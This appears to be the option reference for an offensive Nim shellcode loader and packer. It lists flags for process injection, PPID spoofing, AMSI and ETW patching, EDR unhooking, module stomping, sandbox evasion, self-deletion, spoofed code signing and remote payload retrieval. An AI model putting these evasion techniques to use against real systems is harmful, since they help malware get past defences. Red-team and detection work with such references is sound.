| Toggle | Option | Description |
|---|---|---|
| --shellcode | Encrypt shellcode to load it on runtime | |
| --dripallocate | Allocate memory Driploader style | |
| --dripsleep | Sleep time in ms between each memory allocation (e.g. 500 milliseconds) | |
| --CallbackExecute | Execute shellcode via a custom Callback function | |
| --localCreateThread | Use NtCreateThreadEx for local injection instead of a direct pointer to the shellcode | |
| --QueueApc | Instead of a direct Pointer or Thread Creation execute the Shellcode via NtQueueApcThread | |
| --noWait | Don't use 'WaitForSingleObject(-1,-1)' after local Injection but exit the process instead afterwards. If your Shellcode exits the Thread/Process itself, this will not have any effect. | |
| --mapSection | Map the shellcode into via NtCreateSection/NtMapViewOfSection . For remote injection decryption will happen AFTER writing the Shellcode into the remote process | |
| --remoteinject | Inject shellcode into a newly spawned process (default notepad) / otherwise it's self-injection | |
| --customprocess | Spawn a custom process (instead of notepad) for remote injection | |
| --ruy-lopez | Use Ruy-Lopez to prevent AV/EDR DLLs from being loaded into the newly spawned process | |
| --remoteprocess | Injects into the specified (existing) remote process name. The loader searches for the first process with that name. Can be used for multiple process names, e.g., --remoteprocess=teams.exe,iexplore.exe,MicrosoftEdge.exe -> First try teams, else Internet Explorer, last Edge |
|
| --spoofArgs | Spoof the arguments of the process to inject into | |
| --parentProcess | Name of the parent Process to spoof (PPID Spoofing) | |
| --blockDLLs | Set the DllBlocklistPolicy to 1 to prevent DLLs from being loaded | |
| --remotepatchAMSI | Patch AMSI in the remote process before shellcode execution | |
| --remotepatchETW | Patch ETW in the remote process before shellcode execution | |
| --threadless | Use Threadless inject for shellcode execution (Threadless Inject) | |
| --threadlessDll | Specify a DLL to use for the Threadless inject hook | |
| --threadlessFunc | Specify a function to use for the Threadless inject hook | |
| --poolparty | Use Poolparty technique 1,2,3,4 for execution. | |
| --Caro-Kann | Use Caro-Kann technique to bypass initial memory scan detections by injecting a second shellcode which sleeps and decrypts (Caro-Kann) | |
| --stomb | Enable Module Stomping to not do memory allocations. By default, 'chakra.dll' is loaded and stomped. | |
| --stombDll | Specify a DLL to use for the Module Stomping (default is 'chakra.dll') | |
| --stombFunc | Specify a function to use for the Module Stomping | |
| --stombFunc2 | Specify a second function to use for the Module Stomping. Only needed if you combine Caro-Kann with Module Stomping as there are two shellcodes than | |
| --restore | Using this option will restore the .text section of the stomped DLL after executing the shellcode. That way, you get rid of Module Stomp IoCs. But this option only works with Payloads, that are reflective DLLs or which create a new thread. |
| Toggle | Option | Description |
|---|---|---|
| --peinject | Encrypt a PE to decrypt and run it on runtime as shellcode via donut. | |
| --peload | Encrypt a PE to decrypt it on runtime and execute it via a syscall variant of Run-PE. |
| Toggle | Option | Description |
|---|---|---|
| --csharp | Encrypt a C# assembly to load it on runtime. | |
| --interactivePS | Load an interactive unmanaged Powershell Runspace (PwnPowershell Github). |
| Toggle | Option | Description |
|---|---|---|
| --dll | Generate DLL instead of an executable | |
| --dllexportfunc | Comma separated names of DLL custom export functions for e.g. DLL-Sideloading | |
| --dllhijack | Add an DLLMain Export with DLL_PROCESS_ATTACH for Hijacking | |
| --noNimMain | Remove NimMain export to avoid this IoC (Use "--dllhijack" in addition to instead export DllMain or alternatively "--dllexportfunc DllMain") | |
| --clone | Specify a local DLL to clone the API-Exports from via Koppeling | |
| --dllProxy | Generate a DLL-Proxying DLL - you need to put the legit DLL into the build directory. Two output DLLs will be generated: The proxy DLL and the randomly renamed legit DLL. (Credit to @byt3bl33d3r - Github Link) | |
| --cpl | Generate a CPL file (Control Panel Applet) instead of an executable |
| Toggle | Option | Description |
|---|---|---|
| -h --help | Show this screen. | |
| --version | Show version. | |
| --key | Key to encrypt with. | |
| --keyfile | File to read key from. | |
| --dnsKey | Use remote DNS TXT Record as key which is retrieved on runtime. | |
| --dnsdomain | Specify a subdomain to use for the DNS TXT Record. | |
| --environmentalKey | Use environmental key (domain,username) to encrypt with. - domain: Enumerate the current domain on runtime and use that as key - username: Enumerate the current username on runtime and use that as key |
|
| --arguments | Compile the following arguments to the encrypted exe/dll. | |
| --metadata | Set custom resource file information (cmd icon, CMD description, ntdll metadata for dlls by default). | |
| --noETW | Don't use ETW Patch. | |
| --noAMSI | Don't patch AMSI. | |
| --noArgs | Don't provide any arguments to the assembly (some can only run without args). | |
| --hide | Compile with --app:gui flag, so that the console won't pop up. | |
| --APIhide | Console won't pop up, hidden via API calls 'GetConsoleWindow' and 'ShowWindow' with 'SW_HIDE'. | |
| --reflective | Set compiler flags, so that the Loader Nim binary can be reflectively loaded. | |
| --debug | Compiles the binary in debug mode. | |
| --x86 | Compiles an x86 binary. | |
| --wow64 | (Compiles a x86 binary that can be used by x64 CPUs). | |
| --large | Use this for large payloads (bigger than 5MB) as you will get an error "interpretation requires too many iterations" without it. | |
| --noDInvoke | Don't use DInvoke - some older Windows OS Versions may crash when DInvoke is in use, e.g. Windows Server 2012. If you get "SIGSEGV: iilegal storage access. (Attempt to read from nil?)" try to use this option. | |
| --verbose | Prints output to the console (for troubleshooting purposes). | |
| --psout | Powershell Output format, reflectively loading the packed binary. | |
| --psobfs | Pre-obfuscated Powershell Template with Invoke-obfuscation. | |
| --pslyrics | Add Lyrics as comments to avoid some more detections. | |
| --sourceonly | Dont compile but just create the source code and compile command. | |
| --RWX | Use RWX memory permissions for Shellcode and PE-Loading (instead of default RX). | |
| --service | Create a Service binary or DLL, which can be used for Lateral Movement or Persistence. | |
| --stegofile | Path to a .bmp or jpeg file in which the encrypted payload will be embedded. |
| Toggle | Option | Description |
|---|---|---|
| --sleep | Sleep 10 seconds before decryption to evade memory scanners. | |
| --sleep-in-between | Sleep 10 seconds at some potentially critical steps in between to evade memory scanners. | |
| --COMVARETW | Block ETW by setting COMPlus_ETWEnabled to 0. | |
| --unhook | Unhook the specified DLL(s) before doing anything else for the current process (can be separated by comma). | |
| --obfuscate | Compile the Nim binary via Denim to make use of LLVM obfuscation. | |
| --macPayload | Convert the encrypted Shellcode to MAC-Addresses to reduce entropy (for embedded Payloads only). | |
| --sgn | Encode shellcode via SGN before encrypting it. | |
| --replace | Replace common nim IoC's in the loader like the string 'nim'. | |
| --noOneShot | By default, the Packer uses Hardware Breakpoints to bypass AMSI, but disables it after the payload has been executed. If you want to keep it enabled for the current Thread, use this option. | |
| --PatchAMSI | Bypass AMSI by patching an offset of amsi.dll/AmsiScanBuffer via Syscalls. | |
| --PatchETW | Bypass ETW by patching ntdll.dll/NtTraceEvent via Syscalls. | |
| --AMSIProviderPatch | Patch all AMSI Providers instead of 'amsi.dll' (AS-22-Korkos-AMSI-and-Bypass.pdf). | |
| --AMSINtCreateSectionHook | Hook NtCreateSection to prevent 'amsi.dll' from being loaded (Read more). | |
| --sandbox | Include Sandbox Checks of your choice into the loader. Options include: - Domain: Only execute if the target domain is == the --domain parameter's domain. If --domain is not set, it will only execute on non-domain joined systems. - DomainJoined: Only execute if the target is connected to ANY domain - you don't need to know the target's domain for this one. - DiskSpace: Only execute if c:\ disk space >= 200GB. - MemorySpace: Only execute if more than 4GB RAM available. - Emulated: VirtualAllocExNuma API call (Some sandboxes do not emulate that). - WindowChanges: Checks if the current Window has changed 7 or more times before executing the payload. |
|
| --domain | Specify a domain for SandBox Evasion. | |
| --pump | Pump the file with:
|
|
| --self-delete | The loader deletes its own executable on runtime (Credit to @byt3bl33d3r and @jonasLyk). | |
| --obfuscatefunctions | Obfuscate some Nim-specific Windows APIs from the IAT via CallObfuscator (Github Link) - only possible from a Windows OS. | |
| --sign | Sign the binary with a spoofed certificate. | |
| --signdomain | The domain to use for the certificate (default is www.microsoft.com). | |
| --llvm | Add compiler flags for LLVM obfuscation, you have to set it up by yourself. | |
| --sleepycrypt | Encrypt the memory of the loader with SleepyCrypt # experimental (Pre-Alpha, not working yet for C2-Stager). | |
| --fluctuate | Enable ShellcodeFluctuation for local shellcode injection and PE-Loading (Alpha) - no support for remote injection. This will only work for C2-Payloads that use Win32 Sleep in between connection attempts, as that is hooked. | |
| --noAntidebug | Leave out AntiDebugger Checks. | |
| --noDefaultSandBox | Leave out default Sandbox Checks. | |
| --noAntiEmulate | Leave out AntiEmulation Checks. | |
| --jmpEntry | This option will enable a custom Shellcode Entrypoint from a DLL-backed function to avoid unbacked memory as Thread/APC start address. The target function will be hooked with a JMP to the Shellcode. | |
| --jmpEntryDLL | Specify a DLL to use for the custom Shellcode Entrypoint. | |
| --jmpEntryFunc | Specify a function to use for the custom Shellcode Entrypoint. |
Default is GetSyscallStub to retrieve the stubs from disk
| --hellsgate | Retrieve Syscalls via Hellsgate technique. | |
| --syswhispers | Embed Syscalls via Syswhispers3 (NimLineWhispers3) technique. | |
| --jump | When using Syswhispers3, use the jumper_randomized technique. |
By default, the Loader will embed the Payload into the output file. There are two alternatives to this:
| Toggle | Option | Description |
|---|---|---|
| --shellcodeFile | Filename to retrieve Payload from - on Runtime (No embedding). The first location will also be the output file location. You can specify multiple locations, separated by a comma. | |
| --shellcodeURL | URL to retrieve Payload from |